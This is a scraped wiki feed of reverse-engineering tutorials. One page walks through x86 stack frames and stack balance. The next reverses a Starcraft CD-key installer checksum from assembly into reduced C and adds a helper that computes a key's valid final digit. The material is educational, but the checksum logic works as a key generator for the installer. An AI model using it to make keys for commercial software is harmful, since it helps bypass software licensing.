<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401001 mov ebp, esp ; Set up the frame pointer.<br />
0x401002 sub esp, 8 ; Make room for two local variables.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center' style='color: red;'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>?</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401003 push esi ; Preserve esi on the stack.<br />
0x401004 push edi ; Preserve edi on the stack.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center' style='color: red;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center' style='color: red;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
Note how in the following section the variables are addressed relative to ebp. The first parameter is at ebp + 8, which is 2 values above ebp on the stack, and the second is at ebp + 12, which is 3 above ebp. Count them to confirm!<br />
<br />
0x401005 mov ecx, [ebp+8] ; Put the first parameter (a pointer) into ecx.<br />
0x401006 mov edx, [ebp+12] ; Put the second parameter (a pointer) into edx.<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100' style='color: green;'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center' style='color: green;'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center'>(unused)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
These lines don't use the stack, so the table will be omitted:<br />
0x401007 mov esi, [ecx] ; Dereference param1 to get the first value.<br />
0x401008 mov edi, [edx] ; Dereference param2 to get the second value.<br />
<br />
<br />
<br />
<br />
0x401009 mov [ebp-4], esi ; Store the first value as a local variable<br />
0x40100a mov [ebp-8], edi ; Store the second value as a local variable<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: red;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: red;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x40100b mov esi, [ebp-8] ; Retrieve them in reverse<br />
0x40100c mov edi, [ebp-4]<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 28, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 24, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 20, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 16, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp - 4''</td><br />
<td align='center' style='color: green;'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp - 8''</td><br />
<td align='center' style='color: green;'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<br />
 0x40100d mov [edx], edi ; Put the first value into the second address (*param2 = first value)<br />
 0x40100e mov [ecx], esi ; Put the second value into the first address (*param1 = second value)<br />
0x40100f pop edi ; Restore the edi register<br />
0x401010 pop esi ; Restore the esi register<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 20, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 16, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 12, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: yellow'>esp + 8, '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp ''''', ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 12''</td><br />
<td align='center' style='color: green;'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 16''</td><br />
<td align='center' style='color: green;'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401011 add esp, 8 ; Remove the local variables from the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 12, ''ebp + 12''</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 8, ''ebp + 8''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4, ''ebp + 4''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp''''', '''''ebp'''''</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4, ''ebp - 4''</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8, ''ebp - 8''</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12, ''ebp - 12''</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16, ''ebp - 16''</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20, ''ebp - 20''</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
0x401012 pop ebp ; Restore ebp<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 8</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp + 4</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan;'>'''''esp '''''</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
<br />
0x401013 ret ; Return (eax isn't set, so there's no return value)<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp + 4</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left' style='color: cyan'>'''''esp'''''</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 4</td><br />
<td align='center' style='color: green;'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
 0x400003 add esp, 8 ; Balance the stack<br />
<table border='1' cellpadding='0' cellspacing='0'><br />
<tr><br />
<td align='left' width='150'>esp - 4</td><br />
<td align='center' width='100'>param2</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 8</td><br />
<td align='center'>param1</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 12</td><br />
<td align='center'>0x400003</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 16</td><br />
<td align='center'>(previous ebp)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 20</td><br />
<td align='center'>esi (var1)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 24</td><br />
<td align='center'>edi (var2)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 28</td><br />
<td align='center'>(esi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 32</td><br />
<td align='center'>(edi)</td><br />
</tr><br />
<tr><br />
<td align='left'>esp - 36</td><br />
<td align='center'>?</td><br />
</tr><br />
</table><br />
<br />
== Balance ==<br />
<br />
This should be rather obvious from the examples shown above, but it is worth paying special attention to.<br />
<br />
Every function should leave the stack pointer in the exact place it received it. In other words, every amount subtracted from the stack pointer (either by sub or push) ''has to be added back to it'' (either by add or pop). If it isn't, the return address won't be where ret expects it and the program will likely crash.<br />
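<br />
The bookkeeping can be checked with a toy model. The following is only a sketch: it tracks nothing but the stack pointer, the Cpu struct and function names are made up for illustration, and the starting value 0x1000 is arbitrary. It replays the pushes, pops, sub and add of the swap function and reports how far esp ends up from where it started:<br />
<br />
```c
#include <assert.h>

/* Toy model: only the stack pointer is tracked, not the stack contents. */
typedef struct {
    unsigned int esp;
} Cpu;

static void push(Cpu *cpu) { cpu->esp -= 4; }   /* push: esp moves down 4 bytes    */
static void pop(Cpu *cpu)  { cpu->esp += 4; }   /* pop: esp moves back up 4 bytes  */

/* Replays the stack operations of the swap function.
   If release_locals is 0, the "add esp, 8" is skipped on purpose.
   Returns how far esp ended up from where it started (0 = balanced). */
int swap_stack_delta(int release_locals)
{
    Cpu cpu = { 0x1000 };            /* arbitrary starting value */
    unsigned int entry = cpu.esp;

    push(&cpu);                      /* push ebp   */
    cpu.esp -= 8;                    /* sub esp, 8 */
    push(&cpu);                      /* push esi   */
    push(&cpu);                      /* push edi   */

    pop(&cpu);                       /* pop edi    */
    pop(&cpu);                       /* pop esi    */
    if(release_locals)
        cpu.esp += 8;                /* add esp, 8 */
    pop(&cpu);                       /* pop ebp    */

    return (int)cpu.esp - (int)entry;
}

/* Self-check: the balanced version nets out to 0, the broken one is 8 bytes off. */
void balance_selfcheck(void)
{
    assert(swap_stack_delta(1) == 0);
    assert(swap_stack_delta(0) == -8);
}
```
<br />
In the unbalanced case esp is 8 bytes too low when ret executes, so ret would pick up one of the local variables instead of the return address.<br />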
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_1&diff=3141Example 12012-01-16T01:05:05Z<p>Killboy: /* Annotated Code */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
Welcome to the first assembly example! If you have read and understood all the sections up to here, there will not be any surprises. <br />
<br />
The code shown below verifies that a CDKey is valid to install the game with. If the CDKey fails to pass this check, the CDKey may not be used to install the game. Whether this succeeds or fails has no bearing on whether the CDKey is valid to log onto Battle.net with. <br />
<br />
The way one should approach this is to do the following:<br />
# Copy all the assembly code to your IDE or somewhere safe. <br />
# Go through each line, and make a note of what it does (typically, putting a ; at the end and adding a comment works well). Try and understand what the code is doing. <br />
# Go through each line, and convert it to the equivalent C code (or Java, if you're more comfortable with that). <br />
# Try and combine and reduce the code to make it as simple as possible. <br />
<br />
I'll go through those steps here, hopefully to give an idea of how to approach a function such as this. I highly recommend you try it yourself first, though. <br />
<br />
== Code ==<br />
<pre><br />
; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
mov eax, 3<br />
mov esi, ecx<br />
xor ecx, ecx<br />
Top:<br />
movsx edx, byte ptr [ecx+esi]<br />
sub edx, 30h<br />
lea edi, [eax+eax]<br />
xor edx, edi<br />
add eax, edx<br />
inc ecx<br />
cmp ecx, 0Ch<br />
jl short Top<br />
<br />
xor edx, edx<br />
mov ecx, 0Ah<br />
div ecx<br />
<br />
movsx eax, byte ptr [esi+0Ch]<br />
add edx, 30h<br />
cmp eax, edx<br />
jnz bottom<br />
<br />
mov eax, 1<br />
ret<br />
<br />
bottom:<br />
xor eax, eax<br />
ret<br />
</pre><br />
<br />
== Annotated Code ==<br />
Please, try this yourself first! <br />
<br />
I've been over this code a dozen times, so I know it very well. I've tried to annotate it as clearly as possible. <br />
<br />
<pre><br />
; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
mov eax, 3 ; Set eax to 3<br />
mov esi, ecx ; Move the cdkey pointer to esi. It'll likely stay there, since esi is non-volatile<br />
xor ecx, ecx ; Clear ecx. Since a loop is coming up, this might be a loop counter<br />
Top:<br />
    movsx edx, byte ptr [ecx+esi] ; ecx is a loop counter, and esi is the cdkey. This takes the ecx'th<br />
; character (dereferenced, because of the square brackets [ ]) and moves<br />
; it into edx. Since it's a character array (string), there is no multiplier<br />
; for the array index. <br />
<br />
sub edx, 30h ; Subtract 0x30 from the character. This converts the ascii character '0', <br />
; '1', '2', etc. to the integer 0, 1, 2, etc.<br />
    lea edi, [eax+eax] ; Set edi to double eax. eax is likely an accumulator, which stores a result. <br />
    xor edx, edi ; Xor the current digit with double the current checksum.<br />
    add eax, edx ; Add the value in edx back into the checksum (eax).<br />
inc ecx ; Increment the loop counter, ecx.<br />
cmp ecx, 0Ch ; Compare the loop counter to 0x0c, or 12. <br />
    jl short Top ; Go back to the top until the 12th character (note that the last character<br />
                 ; is skipped)<br />
<br />
xor edx, edx ; Clear edx<br />
    mov ecx, 0Ah ; Set ecx to 0x0a (10)<br />
div ecx ; Remember division? edx is cleared above, so this basically does eax / ecx<br />
; We don't know yet whether it will use the quotient (eax) or remainder (edx)<br />
<br />
movsx eax, byte ptr [esi+0Ch] ; Move the last character in the cdkey to eax. Note that this used move with <br />
; sign extension, which means the character is signed. Because it's an ascii <br />
; number (between 0x30 and 0x39), it'll never be negative so this doesn't<br />
; matter. <br />
add edx, 30h ; Convert edx (which is the remainder from the division -- the checksum % 10)<br />
; back to an ascii character. From the integer 0, 1, 2, etc. to the characters<br />
; '0', '1', '2', etc.<br />
<br />
cmp eax, edx ; Compare the last digit of the cdkey to the checksum result. <br />
jnz bottom ; If they aren't equal, jump to the bottom, which returns 0<br />
<br />
mov eax, 1 ; Return 1<br />
ret<br />
<br />
bottom:<br />
xor eax, eax ; Clear eax, and return 0<br />
ret<br />
</pre><br />
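<br />
The note about sign extension can be illustrated in C. This is a minimal sketch, not part of the original function: sign_extend and zero_extend are hypothetical helpers, movzx (the zero-extending counterpart of movsx) is not used in the code above, and the cast to signed char assumes a typical two's-complement compiler such as gcc:<br />
<br />
```c
#include <assert.h>

/* movsx: widen a signed 8-bit value to 32 bits, copying the sign bit. */
int sign_extend(unsigned char byte)
{
    return (int)(signed char)byte;
}

/* movzx: widen an unsigned 8-bit value to 32 bits, filling with zeroes. */
int zero_extend(unsigned char byte)
{
    return (int)byte;
}

/* Self-check: ascii digits come out the same either way; bytes with the
   top bit set do not. */
void extension_selfcheck(void)
{
    assert(sign_extend('7') == 0x37);
    assert(zero_extend('7') == 0x37);
    assert(zero_extend(0x80) == 128);
    assert(sign_extend(0x80) == -128);
}
```
<br />
Since every digit of the cdkey is between 0x30 and 0x39, the top bit is never set and both forms give the same result, which is why the annotation says it doesn't matter here.<br />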
<br />
== C Code ==<br />
Please, try this yourself first! <br />
<br />
This is an absolutely direct conversion from the annotated assembly to C. I added a main function that sends a bunch of test keys through the function to print out the results. <br />
<br />
Now that a driver function can test the CDKey validator, the code can be reduced and condensed. <br />
<br />
<pre><br />
#include <stdio.h><br />
<br />
/* Prototype */<br />
int checkCDKey(char *key);<br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* A series of test cases (I'm using fake keys here obviously, but real ones work even better) */<br />
char *keys[] = { "1212121212121", /* Valid */<br />
"3781030596831", /* Invalid */<br />
"3748596030203", /* Invalid */<br />
"1234567890123", /* Valid */<br />
"4962883551538", /* Valid */<br />
"0000000000000", /* Invalid */<br />
"1111111111111", /* Invalid */<br />
"2222222222222", /* Invalid */<br />
"3333333333333", /* Valid */<br />
"4444444444444", /* Invalid */<br />
"5555555555555", /* Invalid */<br />
"6666666666666", /* Invalid */<br />
"7777777777777", /* Invalid */<br />
"8888888888888", /* Invalid */<br />
"9999999999999" /* Invalid */<br />
};<br />
int valid[] = { 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 };<br />
int i;<br />
<br />
for(i = 0; i < 15; i++)<br />
printf("%s: %d == %d\n", keys[i], valid[i], checkCDKey(keys[i]));<br />
<br />
return 0;<br />
}<br />
<br />
int checkCDKey(char *key)<br />
{<br />
int eax, ebx, ecx, edx, edi;<br />
char *esi;<br />
<br />
    // This is C code, written and tested with the gcc compiler under Linux. However, it should work universally. <br />
// ; Note: ecx is a pointer to a 13-digit Starcraft cdkey<br />
// ; This is a function that returns 1 if it's a valid key, or 0 if it's invalid<br />
// mov eax, 3 ; Set eax to 3<br />
eax = 3;<br />
// mov esi, ecx ; Move the cdkey pointer to esi. It'll likely stay there, since esi is non-volatile<br />
esi = key;<br />
// xor ecx, ecx ; Clear ecx. Since a loop is coming up, this might be a loop counter<br />
ecx = 0;<br />
// Top:<br />
do<br />
{<br />
        // movsx edx, byte ptr [ecx+esi] ; ecx is a loop counter, and esi is the cdkey. This takes the ecx'th<br />
        // ; character (dereferenced, because of the square brackets [ ]) and moves<br />
        // ; it into edx. Since it's a character array (string), there is no multiplier<br />
// ; for the array index. <br />
edx = *(ecx + esi);<br />
//<br />
// sub edx, 30h ; Subtract 0x30 from the character. This converts the ascii character '0', <br />
// ; '1', '2', etc. to the integer 0, 1, 2, etc.<br />
edx = edx - 0x30;<br />
        // lea edi, [eax+eax] ; Set edi to double eax. eax is likely an accumulator, which stores a result. <br />
        edi = eax + eax;<br />
        // xor edx, edi ; Xor the current digit with double the current checksum.<br />
        edx = edx ^ edi;<br />
        // add eax, edx ; Add the value in edx back into the checksum (eax).<br />
eax = eax + edx;<br />
// inc ecx ; Increment the loop counter, ecx.<br />
ecx++;<br />
// cmp ecx, 0Ch ; Compare the loop counter to 0x0c, or 12. <br />
// jl short Top ; Go back to the top until the 12th character (note that the last character<br />
}<br />
while(ecx < 0x0c);<br />
    // ; is skipped)<br />
//<br />
// xor edx, edx ; Clear edx<br />
edx = 0;<br />
    // mov ecx, 0Ah ; Set ecx to 0x0a (10)<br />
ecx = 0x0a;<br />
// div ecx ; Remember division? edx is cleared above, so this basically does eax / ecx<br />
// ; We don't know yet whether it will use the quotient (eax) or remainder (edx)<br />
edx = eax % ecx;<br />
//<br />
// movsx eax, byte ptr [esi+0Ch] ; Move the last character in the cdkey to eax. Note that this used move with <br />
// ; sign extension, which means the character is signed. Because it's an ascii <br />
// ; number (between 0x30 and 0x39), it'll never be negative so this doesn't<br />
// ; matter. <br />
eax = *(esi + 0x0c);<br />
// add edx, 30h ; Convert edx (which is the remainder from the division -- the checksum % 10)<br />
// ; back to an ascii character. From the integer 0, 1, 2, etc. to the characters<br />
// ; '0', '1', '2', etc.<br />
edx = edx + 0x30;<br />
//<br />
// cmp eax, edx ; Compare the last digit of the cdkey to the checksum result. <br />
if(eax == edx)<br />
{<br />
// jnz bottom ; If they aren't equal, jump to the bottom, which returns 0<br />
//<br />
// mov eax, 1 ; Return 1<br />
// ret<br />
return 1;<br />
}<br />
else<br />
{<br />
//<br />
// bottom:<br />
// xor eax, eax ; Clear eax, and return 0<br />
// ret<br />
return 0;<br />
}<br />
}<br />
</pre><br />
<br />
Here is the output:<br />
<pre><br />
1212121212121: 1 == 1<br />
3781030596831: 0 == 0<br />
3748596030203: 0 == 0<br />
1234567890123: 1 == 1<br />
4962883551538: 1 == 1<br />
0000000000000: 0 == 0<br />
1111111111111: 0 == 0<br />
2222222222222: 0 == 0<br />
3333333333333: 1 == 1<br />
4444444444444: 0 == 0<br />
5555555555555: 0 == 0<br />
6666666666666: 0 == 0<br />
7777777777777: 0 == 0<br />
8888888888888: 0 == 0<br />
9999999999999: 0 == 0<br />
</pre><br />
<br />
== Cleaned up C Code == <br />
Here's the same code with the assembly removed and some minor cleanups. After every change, the program should be run again to ensure that the code still works as expected. The driver function is unchanged, so here's the cleaned up C function:<br />
<br />
<pre><br />
int checkCDKey(char *key)<br />
{ <br />
int eax, ebx, ecx, edx, edi; <br />
char *esi;<br />
<br />
eax = 3;<br />
esi = key;<br />
ecx = 0;<br />
<br />
do<br />
{<br />
edx = *(ecx + esi);<br />
edx = edx - 0x30;<br />
edi = eax + eax;<br />
edx = edx ^ edi;<br />
eax = eax + edx;<br />
ecx++;<br />
}<br />
while(ecx < 0x0c);<br />
<br />
edx = 0;<br />
ecx = 0x0a;<br />
edx = eax % ecx;<br />
eax = *(esi + 0x0c);<br />
edx = edx + 0x30;<br />
if(eax == edx)<br />
return 1;<br />
else<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Reduced C Code ==<br />
In this section the code will be reduced and cleaned up to be as friendly as possible. Technically, the above function can be left the way it is, but reducing it is a good learning exercise. <br />
<br />
First, the variables are renamed, unused variables are removed, and the return is condensed:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = *(i + key);<br />
temp = temp - 0x30;<br />
temp2 = accum + accum;<br />
temp = temp ^ temp2;<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = 0;<br />
i = 0x0a;<br />
temp = accum % i;<br />
accum = *(key + 0x0c);<br />
temp = temp + 0x30;<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Replace the pointers with array indexing, which looks a lot nicer:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = key[i];<br />
temp = temp - 0x30;<br />
temp2 = accum + accum;<br />
temp = temp ^ temp2;<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = 0;<br />
i = 0x0a;<br />
temp = accum % i;<br />
accum = key[12];<br />
temp = temp + 0x30;<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Substitute some variables with their values:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp, temp2; <br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
do<br />
{<br />
temp = key[i] - 0x30;<br />
temp = temp ^ (accum + accum);<br />
accum = accum + temp;<br />
i++;<br />
}<br />
while(i < 0x0c);<br />
<br />
temp = (accum % 10) + 0x30;<br />
accum = key[12];<br />
<br />
return accum == temp;<br />
}<br />
</pre><br />
<br />
Substitute some more variables, and replace the do..while loop with a for loop:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
int temp;<br />
<br />
accum = 3;<br />
i = 0;<br />
<br />
for(i = 0; i < 12; i++)<br />
{<br />
temp = (key[i] - 0x30) ^ (accum + accum);<br />
accum = accum + temp;<br />
}<br />
<br />
<br />
return key[12] == ((accum % 10) + 0x30);<br />
}<br />
</pre><br />
<br />
== Finished Code ==<br />
And finally, substitute the last of the variables:<br />
<pre><br />
int checkCDKey(char *key)<br />
{<br />
int accum = 3;<br />
int i;<br />
<br />
for(i = 0; i < 12; i++)<br />
accum += (key[i] - 0x30) ^ (accum + accum);<br />
<br />
return key[12] == ((accum % 10) + 0x30);<br />
}<br />
</pre><br />
<br />
That's as reduced as it gets. And running it through the driver function still works. <br />
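<br />
As a further check on the finished function, the sketch below factors the checksum loop into a helper and adds a function that fills in the 13th digit of a key. The names cdkeyChecksum and fixCDKey are assumptions made for illustration; they are not part of the original program or its driver. '0' is used in place of 0x30, which is the same value in ASCII.<br />

```c
#include <assert.h>
#include <string.h>

/* Same loop as the finished checkCDKey, returning the checksum digit (0-9). */
static int cdkeyChecksum(const char *key)
{
    int accum = 3;
    int i;

    for(i = 0; i < 12; i++)
        accum += (key[i] - '0') ^ (accum + accum);

    return accum % 10;
}

/* Returns 1 if the 13th character matches the checksum digit, 0 otherwise. */
int checkCDKey(const char *key)
{
    assert(key != NULL && strlen(key) >= 13);
    return key[12] == cdkeyChecksum(key) + '0';
}

/* Hypothetical helper: overwrites key[12] so that the key passes checkCDKey. */
void fixCDKey(char *key)
{
    assert(key != NULL && strlen(key) >= 13);
    key[12] = (char)(cdkeyChecksum(key) + '0');
}
```

Calling fixCDKey on any 13-character string of digits and then passing it to checkCDKey should return 1, while changing the last digit afterwards should make it return 0.<br />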
<br />
That's all for example 1. The next example will demonstrate the way in which the Starcraft CDKey is shuffled before it is encoded.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Simple_Instructions&diff=3140Simple Instructions2012-01-16T01:01:55Z<p>Killboy: /* cmp, test */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
